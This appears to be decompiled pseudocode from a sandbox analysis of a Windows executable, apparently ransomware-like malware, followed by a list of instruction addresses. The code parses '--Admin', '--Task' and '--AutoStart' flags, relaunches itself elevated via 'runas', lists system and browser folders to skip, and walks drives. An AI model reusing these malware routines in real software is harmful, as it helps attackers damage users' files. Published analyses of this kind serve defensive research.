														if( *0x51a7c0 != 0) {
															_t995 = 0x51a7c0;
															_t210 =  &(_t995[1]); // 0x51a7c2
															_t1205 = _t210;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[1]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - _t1205;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														_push(0);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
														E00413FF0(0, _t1008,  &_a228);
														_t1207 = E00412900( &_v40, 0);
														_t955 = _v52 + 0x828;
														_t1276 = _t1275 + 0x18;
														__eflags = _t955 - _t1207;
														if(_t955 != _t1207) {
															__eflags = _t955[5] - 8;
															if(_t955[5] >= 8) {
																L00422587( *_t955);
																_t1276 = _t1276 + 4;
															}
															_t955[5] = 7;
															_t955[4] = 0;
															 *_t955 = 0;
															__eflags = _t1207[5] - 8;
															if(_t1207[5] >= 8) {
																 *_t955 =  *_t1207;
																 *_t1207 = 0;
															} else {
																_t839 = _t1207[4] + 1;
																__eflags = _t839;
																if(_t839 != 0) {
																	E004205A0(_t955, _t1207, _t839 + _t839);
																	_t1276 = _t1276 + 0xc;
																}
															}
															_t955[4] = _t1207[4];
															_t955[5] = _t1207[5];
															__eflags = 0;
															_t1207[5] = 7;
															_t1207[4] = 0;
															 *_t1207 = 0;
														}
														__eflags = _v16 - 8;
														if(__eflags >= 0) {
															L00422587(_v36);
															_t1276 = _t1276 + 4;
														}
														E0040EF50(0x50fef0,  &_v44, __eflags, 0xa);
														_t1234 = _v44;
														_t1277 = _t1276 + 4;
														_a216 = 0xf;
														_t1208 = 0;
														__eflags = 0;
														_a212 = 0;
														_a196 = 0;
														do {
															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
															__eflags =  *_t1178;
															if( *_t1178 != 0) {
																_t1011 = _t1178;
																_t955 = _t1011 + 1;
																do {
																	_t608 =  *_t1011;
																	_t1011 = _t1011 + 1;
																	__eflags = _t608;
																} while (_t608 != 0);
																_t1012 = _t1011 - _t955;
																__eflags = _t1012;
															} else {
																_t1012 = 0;
															}
															_push(_t1012);
															E00413EA0(_t955,  &_a196, _t1208, _t1234, _t1178);
															_t1208 = _t1208 + 1;
															__eflags = _t1208 - 0xa;
														} while (_t1208 < 0xa);
														_t1278 = _t1277 - 0x18;
														_t1014 = _t1278;
														_push(0xffffffff);
														_push(0);
														 *(_t1014 + 0x14) = 0xf;
														 *(_t1014 + 0x10) = 0;
														 *_t1014 = 0;
														E00413FF0(0, _t1014,  &_a192);
														_t1209 = E00412900( &_v52, 0);
														_t958 = _v64 + 0x840;
														_t1279 = _t1278 + 0x18;
														__eflags = _t958 - _t1209;
														if(_t958 != _t1209) {
															__eflags = _t958[5] - 8;
															if(_t958[5] >= 8) {
																L00422587( *_t958);
																_t1279 = _t1279 + 4;
															}
															_t958[5] = 7;
															_t958[4] = 0;
															 *_t958 = 0;
															__eflags = _t1209[5] - 8;
															if(_t1209[5] >= 8) {
																 *_t958 =  *_t1209;
																 *_t1209 = 0;
															} else {
																_t828 = _t1209[4] + 1;
																__eflags = _t828;
																if(_t828 != 0) {
																	E004205A0(_t958, _t1209, _t828 + _t828);
																	_t1279 = _t1279 + 0xc;
																}
															}
															_t958[4] = _t1209[4];
															_t958[5] = _t1209[5];
															__eflags = 0;
															_t1209[5] = 7;
															_t1209[4] = 0;
															 *_t1209 = 0;
														}
														__eflags = _v28 - 8;
														if(__eflags >= 0) {
															L00422587(_v48);
															_t1279 = _t1279 + 4;
														}
														E0040EF50(0x50ff20,  &_v56, __eflags, 0xa);
														_t1235 = _v56;
														_t1280 = _t1279 + 4;
														_a276 = 0xf;
														_t1210 = 0;
														__eflags = 0;
														_a272 = 0;
														_a256 = 0;
														do {
															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
															__eflags =  *_t1181;
															if( *_t1181 != 0) {
																_t1017 = _t1181;
																_t958 = _t1017 + 1;
																do {
																	_t614 =  *_t1017;
																	_t1017 = _t1017 + 1;
																	__eflags = _t614;
																} while (_t614 != 0);
																_t1018 = _t1017 - _t958;
																__eflags = _t1018;
															} else {
																_t1018 = 0;
															}
															_push(_t1018);
															E00413EA0(_t958,  &_a256, _t1210, _t1235, _t1181);
															_t1210 = _t1210 + 1;
															__eflags = _t1210 - 0xa;
														} while (_t1210 < 0xa);
														_t1281 = _t1280 - 0x18;
														_t1020 = _t1281;
														_push(0xffffffff);
														_push(0);
														 *(_t1020 + 0x14) = 0xf;
														 *(_t1020 + 0x10) = 0;
														 *_t1020 = 0;
														E00413FF0(0, _t1020,  &_a252);
														_t618 = E00412900( &_v64, 0);
														_t1236 = _v76;
														_t1211 = _t618;
														_t1282 = _t1281 + 0x18;
														_t960 = _t1236 + 0x870;
														__eflags = _t960 - _t1211;
														if(_t960 != _t1211) {
															__eflags = _t960[5] - 8;
															if(_t960[5] >= 8) {
																L00422587( *_t960);
																_t1282 = _t1282 + 4;
															}
															_t960[5] = 7;
															_t960[4] = 0;
															 *_t960 = 0;
															__eflags = _t1211[5] - 8;
															if(_t1211[5] >= 8) {
																 *_t960 =  *_t1211;
																 *_t1211 = 0;
															} else {
																_t817 = _t1211[4] + 1;
																__eflags = _t817;
																if(_t817 != 0) {
																	E004205A0(_t960, _t1211, _t817 + _t817);
																	_t1282 = _t1282 + 0xc;
																}
															}
															_t960[4] = _t1211[4];
															_t960[5] = _t1211[5];
															__eflags = 0;
															_t1211[5] = 7;
															_t1211[4] = 0;
															 *_t1211 = 0;
														}
														__eflags = _v40 - 8;
														if(_v40 >= 8) {
															L00422587(_v60);
															_t1282 = _t1282 + 4;
														}
														_push(0xb);
														_v40 = 7;
														_v44 = 0;
														_v60 = 0;
														E00415C10(_t960,  &_v60, _t1211, _t1236, L"C:\\Windows\\");
														_t1237 = _t1236 + 0x888;
														E00413580(_t960, _t1236 + 0x888,  &_v68);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v64);
															_t1282 = _t1282 + 4;
														}
														_push(0x27);
														_v44 = 7;
														_v48 = 0;
														_v64 = 0;
														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v72);
														__eflags = _v56 - 8;
														if(_v56 >= 8) {
															L00422587(_v68);
															_t1282 = _t1282 + 4;
														}
														_push(0x29);
														_v48 = 7;
														_v52 = 0;
														_v68 = 0;
														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v76);
														__eflags = _v60 - 8;
														if(_v60 >= 8) {
															L00422587(_v72);
															_t1282 = _t1282 + 4;
														}
														_push(0x1e);
														_v52 = 7;
														_v56 = 0;
														_v72 = 0;
														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
														E00413580(_t960, _t1237,  &_v80);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v76);
															_t1282 = _t1282 + 4;
														}
														_push(0x21);
														_v56 = 7;
														_v60 = 0;
														_v76 = 0;
														E00415C10(_t960,  &_v76, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v84);
														__eflags = _v68 - 8;
														if(_v68 >= 8) {
															L00422587(_v80);
															_t1282 = _t1282 + 4;
														}
														_push(0x23);
														_v60 = 7;
														_v64 = 0;
														_v80 = 0;
														E00415C10(_t960,  &_v80, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v88);
														__eflags = _v72 - 8;
														if(_v72 >= 8) {
															L00422587(_v84);
															_t1282 = _t1282 + 4;
														}
														_push(0x18);
														_v64 = 7;
														_v68 = 0;
														_v84 = 0;
														E00415C10(_t960,  &_v84, _t1211, _t1237, L"C:\\Program Files\\Google\\");
														E00413580(_t960, _t1237,  &_v92);
														__eflags = _v76 - 8;
														if(_v76 >= 8) {
															L00422587(_v88);
															_t1282 = _t1282 + 4;
														}
														E00413100( &_v88, _t1211, L"D:\\Windows\\");
														_v64 = E00415200( &_v48);
														_t353 = E00415610(_t648) + 0x880; // 0x880
														E00413580(_t960, _t353,  &_v92);
														E00413210( &_v96);
														E00413100( &_v96, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
														_t1212 = E00413920( &_v56);
														_t358 = _t1212 + 0x880; // 0x880
														_t961 = _t358;
														E00413580(_t358, _t358,  &_v100);
														E00413210( &_v104);
														E00413100( &_v104, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v108);
														E00413210( &_v112);
														E00413100( &_v112, _t1212, L"D:\\Program Files (x86)\\Google\\");
														E00413580(_t961, _t961,  &_v116);
														E00413210( &_v120);
														E00413100( &_v120, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t961, _t961,  &_v124);
														E00413210( &_v128);
														E00413100( &_v128, _t1212, L"D:\\Program Files\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v132);
														E00413210( &_v136);
														E00413100( &_v136, _t1212, L"D:\\Program Files\\Google\\");
														E00413580(_t961, _t961,  &_v140);
														E00413210( &_v144);
														_t375 = _t1212 + 0x868; // 0x868
														_t1238 = _t375;
														_t677 = E00413490(_t375, 0);
														__eflags =  *_t677 - 0x2e;
														if( *_t677 != 0x2e) {
															_t800 = E0041CDD0( &_v88, _t1238);
															_t1282 = _t1282 + 4;
															E004131D0(_t1238, _t800);
															E00413210( &_v92);
														}
														E0041C140(E00413560( &_v88), _t961);
														E00413600( &_v92);
														E0040EF50(0x50ff50,  &_v104, __eflags, 0xa);
														_t1283 = _t1282 + 4;
														E00412C20( &_a288);
														_t962 = _v104;
														_t1239 = 0;
														do {
															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
															_t1239 = _t1239 + 1;
															__eflags = _t1239 - 0xa;
														} while (_t1239 < 0xa);
														_v20 = 0x100;
														GetUserNameW( &_a376,  &_v20);
														E00413930( &_v88);
														_t1284 = _t1283 - 0x18;
														E00412C40(_t1284, _t1212, "|");
														_t1285 = _t1284 - 0x18;
														E00412BF0(_t1285,  &_a288);
														E0040ECB0( &_v96);
														_t1286 = _t1285 + 0x30;
														_v112 =  *((intOrPtr*)(E0041C410( &_v96,  &_v108)));
														_t697 = E0041C450( &_v116, E0041C420( &_v100,  &_v108));
														__eflags = _t697;
														if(_t697 != 0) {
															do {
																_t782 = E00412F40(E0041C430( &_v100));
																_t1290 = _t1286 - 0x18;
																E00412C40(_t1290, _t1212, _t782);
																_t784 = E00412900( &_v20, 0);
																_t400 = _t1212 + 0x880; // 0x880
																E00413580(_t962, _t400, _t784);
																E00413210( &_v24);
																_t788 = E00413100( &_a84, _t1212,  &_a368);
																_t789 = E00413100( &_v28, _t1212, L"%username%");
																_t405 = _t1212 + 0x880; // 0x880
																_t1239 = _t789;
																_t790 = E00413660(_t405);
																_t406 = _t1212 + 0x880; // 0x880
																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
																_t1286 = _t1290 + 0x1c;
																E00413210( &_v36);
																E00413210( &_a72);
																E0041C440( &_v120);
																_t799 = E0041C450( &_v124, E0041C420( &_v108,  &_v116));
																__eflags = _t799;
															} while (_t799 != 0);
														}
														_t414 = _t1212 + 0x880; // 0x880
														E004136C0(_t414,  &_a192);
														E0040CA70(_t962,  &_v48, _t1212, _t1239);
														_t416 = _t1212 + 0x850; // 0x850
														E004130B0(_t1286 - 0x18, _t416);
														E0040C740();
														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
														E0041BA10(_a4);
														_t707 = E0041BA80(_a4);
														__eflags = _t707;
														if(_t707 != 0) {
															 *(_t1212 + 0x8c0) = 0;
															 *_t1212 =  *0x51323c;
															E00413560( &_v16);
															E00410A50( &_v16);
															E0041C140(E00413560( &_v44),  &_v16);
															E00413600( &_v48);
															E00413100( &_v48, _t1212, L"F:\\");
															E00413580(_t962,  &_v24,  &_v52);
															E00413210( &_v56);
															E00413640( &_v28,  &_v112);
															_t723 = E00413900( &_v120, E00413650( &_v32,  &_v60));
															__eflags = _t723;
															if(_t723 != 0) {
																_t966 = _v60;
																do {
																	E0041C330(_t1212, _t1239, E0041F110( &_v96));
																	E0041C240(_t1212, _t1239, E00419D10( &_a884));
																	L214();
																	_t770 = E0041C2F0();
																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
																	_t1239 = _t770;
																	E0041B8B0(_t966, _t1239, _t966);
																	_t773 = E004134B0(E0041C470( &_v112));
																	_t441 = _t1239 + 0x8a4; // 0x8a4
																	E00413260(_t441, _t1212, _t773);
																	 *((char*)(_t1239 + 0x8e0)) = 1;
																	E0041FA10(E0041C3D0(), _t1239);
																	E004138D0( &_v120);
																	_t780 = E00413900( &_v124, E00413650( &_v36,  &_v64));
																	__eflags = _t780;
																} while (_t780 != 0);
															}
															 *0x529238 =  *0x51323c;
															E0041FDC0(0x529238);
															_t727 = GetMessageW( &_a260, 0, 0, 0);
															__eflags = _t727;
															if(_t727 != 0) {
																do {
																	TranslateMessage( &_a264);
																	DispatchMessageW( &_a264);
																	_t765 = GetMessageW( &_a264, 0, 0, 0);
																	__eflags = _t765;
																} while (_t765 != 0);
															}
															_t728 =  *0x513250;
															__eflags = _t728;
															if(_t728 != 0) {
																PostThreadMessageW(_t728, 0x12, 0, 0);
																do {
																	_t754 = PeekMessageW( &_a92, 0, 0, 0, 1);
																	__eflags = _t754;
																	if(_t754 != 0) {
																		do {
																			DispatchMessageW( &_a92);
																			_t759 = PeekMessageW( &_a92, 0, 0, 0, 1);
																			__eflags = _t759;
																		} while (_t759 != 0);
																	}
																	_t755 = WaitForSingleObject( *0x513240, 0xa);
																	__eflags = _t755 - 0x102;
																} while (_t755 == 0x102);
															}
															_t729 =  *0x51324c;
															__eflags = _t729;
															if(_t729 != 0) {
																PostThreadMessageW(_t729, 0x12, 0, 0);
																do {
																	_t746 = PeekMessageW( &_a92, 0, 0, 0, 1);
																	__eflags = _t746;
																	if(_t746 != 0) {
																		do {
																			DispatchMessageW( &_a92);
																			_t751 = PeekMessageW( &_a92, 0, 0, 0, 1);
																			__eflags = _t751;
																		} while (_t751 != 0);
																	}
																	_t747 = WaitForSingleObject( *0x513248, 0xa);
																	__eflags = _t747 - 0x102;
																} while (_t747 == 0x102);
															}
															__eflags =  *0x513234;
															_t730 =  *0x513230;
															if( *0x513234 == 0) {
																_t730 =  *0x513238;
															}
															__eflags = _t730;
															if(_t730 != 0) {
																CloseHandle(_t730);
															}
															_t1242 = _a272;
															E00413600( &_v16);
														} else {
															_t1242 = 0;
														}
														E004139D0( &_v88);
														E00412D50( &_a292);
														E00412D50( &_a216);
														E00412D50( &_a144);
														E00412D50( &_a168);
													} else {
														_t1242 = 0;
													}
													E00412D50( &_a240);
												} else {
													_t868 = GetVersion();
													__eflags = _t868 - 5;
													if(_t868 <= 5) {
														goto L60;
													} else {
														lstrcpyW( &_a968, L"--Admin");
														lstrcatW( &_a968, L" IsNotAutoStart");
														lstrcatW( &_a968, L" IsNotTask");
														E0042B420( &_a400, 0, 0x38);
														_a396.cbSize = 0x3c;
														_a412 =  &_a3248;
														_t1268 = _t1268 + 0xc;
														_a400 = 0;
														_a416 =  &_a968;
														_t879 = _t1230 + 0x10;
														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
															_t879 =  *_t879;
														}
														_a420 = _t879;
														_a424 = 5;
														_a408 = L"runas";
														_t881 = ShellExecuteExW( &_a396); // executed
														__eflags = _t881;
														if(_t881 == 0) {
															L61:
															_t581 = _a16;
															goto L62;
														} else {
															_t1242 = 0;
														}
													}
												}
											}
										}
									}
									E00413210( &_a192);
									E00413210( &_a120);
									E00412D50( &_a44);
									E00413B10( &_a32);
									return _t1242;
								} else {
									__eflags = 0;
									E00413B10( &_a116);
									return 0;
								}
							} else {
								_t1145 = _a28;
								_v12 = _t1145 + 0x14;
								_t968 = _t1145 + 0xc;
								_a24 = _t1145 + 0x10;
								while(1) {
									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
									_t1264 = _t1264 + 8;
									__eflags = _t895;
									_t896 = _a28;
									if(_t895 != 0) {
										goto L17;
									}
									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
									__eflags = lstrcmpW(L"IsTask",  *_t968);
									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
									 *0x513235 = 1;
									_t1201 = _t1201 + 2;
									_a24 =  &(_a24[2]);
									_t968 =  &(_t968[2]);
									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
									_t923 =  &(_v12[2]);
									L25:
									_a24 =  &(_a24[1]);
									_t1201 = _t1201 + 1;
									_t968 =  &(_t968[1]);
									_v12 =  &(_t923[1]);
									__eflags = _t1201 - _a36;
									if(_t1201 < _a36) {
										_t1145 = _a28;
										continue;
									} else {
										goto L26;
									}
									goto L235;
									L17:
									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
									_t1264 = _t1264 + 8;
									__eflags = _t897;
									_t898 = _a28;
									if(_t897 != 0) {
										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
										_t1264 = _t1264 + 8;
										__eflags = _t899;
										if(_t899 != 0) {
											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
											_t1264 = _t1264 + 8;
											__eflags = _t901;
											if(_t901 != 0) {
												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
												_t1264 = _t1264 + 8;
												__eflags = _t903;
												if(_t903 == 0) {
													_t969 = _a28;
													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
													_a40 = _t1248;
													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
													while(1) {
														_t1220 = OpenProcess(0x100000, 0, _t1248);
														__eflags = _t1220;
														if(_t1220 == 0) {
															break;
														}
														_t916 = WaitForSingleObject(_t1220, 0x1f4);
														_t917 = CloseHandle(_t1220);
														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
															break;
														} else {
															_t919 = E00411AB0();
															__eflags = _t919;
															if(_t919 != 0) {
																GlobalFree(_t969);
																__eflags = 0;
																E00413B10( &_a116);
																return 0;
															} else {
																Sleep(1);
																_t1248 = _a40;
																continue;
															}
														}
														goto L235;
													}
													E00411CD0(_t969, 0, 0);
													 *0x529224 = 0;
													_t1249 = GetCurrentProcess();
													_a40 = 0;
													GetExitCodeProcess(_t1249,  &_a40);
													TerminateProcess(_t1249, _a40);
													CloseHandle(_t1249);
													__eflags = 0;
													E00413B10( &_a116);
													return 0; // executed
												} else {
													goto L24;
												}
											} else {
												_a20 = 1;
												goto L24;
											}
										} else {
											_a32 = 1;
											L24:
											_t923 = _v12;
											goto L25;
										}
									} else {
										 *0x513234 = 1;
										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
										lstrcpyW(0x521cf0,  *_t968);
										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
										__eflags = lstrcmpW(L"IsTask",  *_v12);
										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
										_a24 =  &(_a24[4]);
										_t1201 = _t1201 + 4;
										_t968 =  &(_t968[4]);
										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
										_t923 =  &(_v12[4]);
										goto L25;
									}
									goto L235;
								}
							}
						}
					}
				} else {
					E004124E0();
					return 0;
				}
				L235:
			}

0x00419f93
0x00419f9b
0x00419fa3
0x00419fa5
0x00419fa6
0x00419fab
0x00419fb2
0x00419fc4
0x00419fd2
0x00419fda
0x00419fe0
0x00419fe2
0x00419fe4
0x00419fe4
0x00419fe6
0x00419ff1
0x00419ff9
0x0041a005
0x0041a00a
0x0041a015
0x0041a017
0x0041a019
0x0041a01c
0x0041b669
0x0041b66e
0x00000000
0x0041a022
0x0041a02a
0x0041a030
0x0041a036
0x0041a038
0x0041a03d
0x0041a048
0x0041a04d
0x0041a058
0x0041a05a
0x0041a05c
0x0041a05f
0x0041b673
0x0041b673
0x0041b678
0x0041b67d
0x0041b67e
0x0041b67f
0x0041b680
0x0041b681
0x0041b683
0x0041b68a
0x0041b692
0x0041b697
0x0041b697
0x0041b69a
0x0041b6a4
0x0041b6ae
0x0041b6b5
0x0041b6bc
0x0041b6c4
0x0041b6c9
0x0041b6c9
0x0041b6ce
0x0041b6d8
0x0041b6e2
0x0041b6e9
0x0041b6ef
0x0041b6f1
0x0041b6fa
0x0041b705
0x0041b70a
0x0041b70d
0x0041b717
0x0041b721
0x0041b721
0x0041b72b
0x0041b731
0x0041b733
0x0041b73c
0x0041b747
0x0041b74c
0x0041b74f
0x0041b759
0x0041b763
0x0041b763
0x0041b76d
0x0041b773
0x0041b775
0x0041b77e
0x0041b789
0x0041b78e
0x0041b791
0x0041b79b
0x0041b7a5
0x0041b7a5
0x0041b7af
0x0041b7b6
0x0041b7be
0x0041b7c3
0x0041b7c3
0x0041b7c8
0x0041b7d2
0x0041b7dc
0x0041b7e3
0x0041b7ea
0x0041b7f2
0x0041b7f7
0x0041b7f7
0x0041b7fc
0x0041b806
0x0041b810
0x0041b817
0x0041b81e
0x0041b826
0x0041b82b
0x0041b82b
0x0041b830
0x0041b83a
0x0041b844
0x0041b84b
0x0041b852
0x0041b85a
0x0041b85f
0x0041b85f
0x0041b864
0x0041b86e
0x0041b878
0x0041b87f
0x0041b883
0x0041b888
0x0041b88d
0x0041b890
0x0041b897
0x0041b899
0x0041b8a0
0x0041b8a5
0x0041a065
0x0041a06d
0x0041a073
0x0041a079
0x0041a07b
0x0041a08f
0x0041a099
0x0041a09d
0x0041a09f
0x0041a0a3
0x0041a0a7
0x0041a0ac
0x0041a0bb
0x0041a0c2
0x0041a0c8
0x0041a0ce
0x0041a0e7
0x0041a0f3
0x0041a0fb
0x0041a100
0x0041a10a
0x0041a10c
0x0041a10e
0x0041a112
0x0041a116
0x0041a11b
0x0041a11b
0x0041a11e
0x0041a120
0x0041a127
0x0041a130
0x0041a13b
0x0041a13b
0x0041a140
0x0041a148
0x0041a151
0x0041a156
0x0041a156
0x0041a159
0x0041a16d
0x0041a173
0x0041a181
0x0041a187
0x0041a18c
0x0041a190
0x0041a33d
0x0041a341
0x0041a347
0x0041a34e
0x0041a45c
0x0041a461
0x0041a354
0x0041a359
0x0041a359
0x0041a464
0x0041a48a
0x0041a48f
0x0041a493
0x0041a496
0x0041a4a1
0x0041a4a1
0x0041a4a3
0x0041a4ae
0x0041a4b6
0x0041a4b6
0x0041a4b9
0x0041a4bc
0x0041a4c2
0x0041a4c7
0x0041a4d0
0x0041a4d0
0x0041a4d2
0x0041a4d3
0x0041a4d3
0x0041a4d7
0x0041a4d7
0x0041a4be
0x0041a4be
0x0041a4be
0x0041a4db
0x0041a4e4
0x0041a4e9
0x0041a4ea
0x0041a4ea
0x0041a4ef
0x0041a4fe
0x0041a506
0x0041a50c
0x0041a51b
0x0041a529
0x0041a531
0x0041a538
0x0041a547
0x0041a553
0x0041a55e
0x0041a563
0x0041a567
0x0041a56a
0x0041a56e
0x0041a570
0x0041a6ea
0x0041a6ea
0x0041a576
0x0041a576
0x0041a578
0x00000000
0x0041a57e
0x0041a580
0x0041a588
0x0041a58a
0x0041a58b
0x0041a59b
0x0041a5a4
0x0041a5af
0x0041a5b2
0x0041a5b6
0x0041a5b8
0x0041a5bf
0x0041a5c6
0x0041a5c7
0x0041a5cf
0x0041a5d6
0x0041a5db
0x0041a5de
0x0041a5e3
0x0041a5e9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5f1
0x0041a578
0x0041a5f5
0x0041a602
0x0041a6f9
0x0041a6f9
0x00000000
0x0041a608
0x0041a608
0x0041a60a
0x0041a702
0x0041a702
0x0041a709
0x00000000
0x0041a70f
0x0041a70f
0x0041a711
0x0041a717
0x0041a719
0x0041a72a
0x0041a72f
0x0041a733
0x0041a736
0x0041a741
0x0041a741
0x0041a743
0x0041a74e
0x0041a752
0x0041a752
0x0041a755
0x0041a758
0x0041a75e
0x0041a760
0x0041a763
0x0041a763
0x0041a765
0x0041a766
0x0041a766
0x0041a76a
0x0041a76a
0x0041a75a
0x0041a75a
0x0041a75a
0x0041a76c
0x0041a775
0x0041a77a
0x0041a77b
0x0041a77b
0x0041a784
0x0041a788
0x0041a78e
0x0041a790
0x0041a792
0x0041a794
0x0041a797
0x0041a797
0x0041a7bb
0x0041a7c1
0x0041a7c9
0x0041a7ce
0x0041a7d4
0x0041a7d9
0x0041a7d9
0x0041a7ce
0x0041a719
0x0041a7e7
0x0041a7ec
0x0041a7ef
0x0041a7ef
0x0041a7f1
0x0041a7f1
0x0041a7f9
0x0041a803
0x0041a813
0x0041a819
0x0041a81e
0x0041a82f
0x0041a83b
0x0041a841
0x0041a842
0x0041a842
0x0041a852
0x0041a854
0x0041a85b
0x0041a87a
0x0041a886
0x0041a88c
0x0041a895
0x0041a89a
0x0041a89a
0x0041a8af
0x0041a8af
0x00000000
0x0041a610
0x0041a610
0x0041a612
0x00000000
0x0041a618
0x0041a618
0x0041a61e
0x0041a8b6
0x0041a8c5
0x0041a8ca
0x0041a8d5
0x0041a8da
0x0041a8de
0x0041a8e1
0x0041a8ec
0x0041a8ec
0x0041a8ee
0x0041a8f9
0x0041a901
0x0041a901
0x0041a904
0x0041a907
0x0041a90d
0x0041a90f
0x0041a912
0x0041a912
0x0041a914
0x0041a915
0x0041a915
0x0041a919
0x0041a919
0x0041a909
0x0041a909
0x0041a909
0x0041a91b
0x0041a924
0x0041a929
0x0041a92a
0x0041a92a
0x0041a92f
0x0041a932
0x0041a93a
0x0041a93c
0x0041a944
0x0041a94b
0x0041a952
0x0041a955
0x0041a95c
0x0041a962
0x0041a967
0x0041a967
0x0041a970
0x0041a970
0x0041a973
0x0041a976
0x0041a976
0x0041a97b
0x0041a97b
0x0041a97d
0x0041a95e
0x0041a95e
0x0041a95e
0x0041a97f
0x0041a987
0x0041a992
0x0041a997
0x0041a99a
0x0041a99e
0x0041a9a0
0x0041a9a0
0x0041a9a6
0x0041a9ab
0x0041a9b0
0x0041a9b4
0x0041a9ba
0x0041a9bf
0x0041a9bf
0x0041a9c6
0x0041a9cc
0x0041a9cf
0x0041a9d8
0x0041a9dd
0x0041a9df
0x0041a9e1
0x0041a9e8
0x0041a9ef
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa04
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0a
0x0041aa0d
0x0041aa0d
0x0041aa12
0x0041aa12
0x0041aa14
0x0041a9fb
0x0041a9fb
0x0041a9fb
0x0041aa16
0x0041aa1e
0x0041aa29
0x0041aa2e
0x0041aa31
0x0041aa35
0x0041aa37
0x0041aa37
0x0041aa3e
0x0041aa44
0x0041aa49
0x0041aa4f
0x0041aa54
0x0041aa54
0x0041aa57
0x0041aa5f
0x0041aa65
0x0041aa6a
0x0041aa6a
0x0041aa70
0x0041aa70
0x0041aa73
